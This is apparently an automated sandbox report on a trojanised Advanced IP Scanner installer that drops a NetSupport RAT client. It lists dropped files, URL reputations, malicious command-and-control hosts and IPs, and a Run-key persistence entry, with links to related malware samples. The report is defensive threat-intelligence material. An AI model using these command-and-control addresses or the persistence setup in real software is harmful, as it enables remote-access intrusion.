                                  C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-G1AVJ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-G1QBE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-GO656.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-GSEGB.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-GUGRV.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-HE8PV.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-HU2BS.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-IG6SE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-IMIK4.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-JD615.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-JMQQ6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-JV2VP.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-KVJOO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-LK5P7.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-MLS3P.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-MRJ39.tmp3%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-NDG98.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-NMSBJ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-OFA57.tmp0%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                  http://ocsp.sectigo.com00%URL Reputationsafe
                                  https://contoso.com/License0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                  https://aka.ms/pscore6lB0%URL Reputationsafe
                                  https://www.remobjects.com/ps0%URL Reputationsafe
                                  https://contoso.com/0%URL Reputationsafe
                                  https://nuget.org/nuget.exe0%URL Reputationsafe
                                  https://www.innosetup.com/0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                                  https://sectigo.com/CPS00%URL Reputationsafe
                                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                  http://ocsp.thawte.com00%URL Reputationsafe
                                  https://contoso.com/Icon0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                                  http://www.symauth.com/cps0(0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                  http://www.symauth.com/rpa000%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  payiki.com
                                  151.236.16.15
                                  truetrue
                                    unknown
                                    geo.netsupportsoftware.com
                                    104.26.1.231
                                    truefalse
                                      unknown
                                      anyhowdo.com
                                      199.188.200.195
                                      truetrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://151.236.16.15/fakeurl.htmtrue
                                          unknown
                                          http://geo.netsupportsoftware.com/location/loca.aspfalse
                                            unknown
                                            http://199.188.200.195/fakeurl.htmtrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.netsupportsoftware.compowershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUAdvanced_IP_Scanner_2.5.4594.12.exefalse
                                                  unknown
                                                  http://%s/testpage.htmwininet.dllpowershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                    unknown
                                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                      unknown
                                                      http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.pci.co.uk/supportsupportclient32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                          unknown
                                                          http://%s/testpage.htmpowershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                            unknown
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.ultimatenetworktool.com/updateAdvanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://%s/fakeurl.htmclient32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                unknown
                                                                http://geo.netsupportsoftware.com/location/loca.asp$kclient32.exe, 00000007.00000003.2067260818.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://geo.netsupportsoftware.com/location/loca.asp5Xclient32.exe, 00000007.00000002.3638542031.000000000049A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.ultimatenetworktool.comAdvanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DE4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.remobjects.com/psAdvanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://contoso.com/powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.innosetup.com/Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                        unknown
                                                                        http://www.macrovision.com0Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                            unknown
                                                                            http://geo.netsupportsoftware.com/location/loca.aspjclient32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                unknown
                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.pci.co.uk/supportclient32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                  unknown
                                                                                  https://sectigo.com/CPS0powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://ocsp.thawte.com0Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.radmin.comAdvanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://127.0.0.1client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                        unknown
                                                                                        http://www.symauth.com/cps0(Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.advanced-ip-scanner.com0Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drfalse
                                                                                            unknown
                                                                                            http://www.ultimatenetworktool.com1Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DEC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.symauth.com/rpa00Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.ultimatenetworktool.com/supportAdvanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://geo.netsupportsoftware.com/location/loca.asp2client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.microxpowershell.exe, 00000005.00000002.2176938305.0000000007540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    104.26.1.231
                                                                                                    geo.netsupportsoftware.comUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    151.236.16.15
                                                                                                    payiki.comEuropean Union
                                                                                                    29802HVC-ASUStrue
                                                                                                    199.188.200.195
                                                                                                    anyhowdo.comUnited States
                                                                                                    22612NAMECHEAP-NETUStrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1546304
                                                                                                    Start date and time:2024-10-31 18:59:42 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 10m 36s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Run name:Run with higher sleep bypass
                                                                                                    Number of analysed new started processes analysed:12
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Advanced_IP_Scanner_2.5.4594.12.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal56.rans.spre.troj.evad.winEXE@10/300@3/3
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 66.7%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 70%
                                                                                                    • Number of executed functions: 176
                                                                                                    • Number of non-executed functions: 235
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7132 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    • VT rate limit hit for: Advanced_IP_Scanner_2.5.4594.12.exe
                                                                                                    TimeTypeDescription
                                                                                                    14:01:43API Interceptor9357375x Sleep call for process: client32.exe modified
                                                                                                    18:00:36Task SchedulerRun new task: {76D64EFA-7A92-4BFE-9669-22CE49CB6146} path: .
                                                                                                    18:01:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                    18:01:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    104.26.1.231file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                    151.236.16.15https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • http://151.236.16.15/fakeurl.htm
                                                                                                    199.188.200.195https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • http://199.188.200.195/fakeurl.htm
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    payiki.comhttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • 151.236.16.15
                                                                                                    geo.netsupportsoftware.comhttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • 172.67.68.212
                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 172.67.68.212
                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 104.26.1.231
                                                                                                    https://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                                                    • 104.26.0.231
                                                                                                    https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 172.67.68.212
                                                                                                    https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 172.67.68.212
                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 172.67.68.212
                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 104.26.0.231
                                                                                                    http://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 104.26.1.231
                                                                                                    anyhowdo.comhttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • 199.188.200.195
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    NAMECHEAP-NETUShttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • 199.188.200.195
                                                                                                    https://saniest.com/PO/PO%20-%20OCT.'24673937.rarGet hashmaliciousUnknownBrowse
                                                                                                    • 162.0.232.202
                                                                                                    #U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                    • 68.65.122.45
                                                                                                    #U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.htaGet hashmaliciousUnknownBrowse
                                                                                                    • 68.65.122.45
                                                                                                    672365339196e.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 68.65.122.45
                                                                                                    18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 162.0.231.203
                                                                                                    WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 162.0.231.203
                                                                                                    HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 63.250.47.57
                                                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 162.0.238.246
                                                                                                    HVC-ASUShttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                    • 151.236.16.15
                                                                                                    PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 23.227.202.197
                                                                                                    IGNM2810202400017701_270620240801_546001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 66.206.22.19
                                                                                                    https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=scGet hashmaliciousUnknownBrowse
                                                                                                    • 69.46.1.10
                                                                                                    nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 23.227.187.69
                                                                                                    splmips.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 172.110.9.223
                                                                                                    jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 149.255.39.213
                                                                                                    kkkmips.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 104.156.53.55
                                                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 66.96.86.101
                                                                                                    CLOUDFLARENETUSoriginal.emlGet hashmaliciousMamba2FABrowse
                                                                                                    • 188.114.96.3
                                                                                                    https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 188.114.96.3
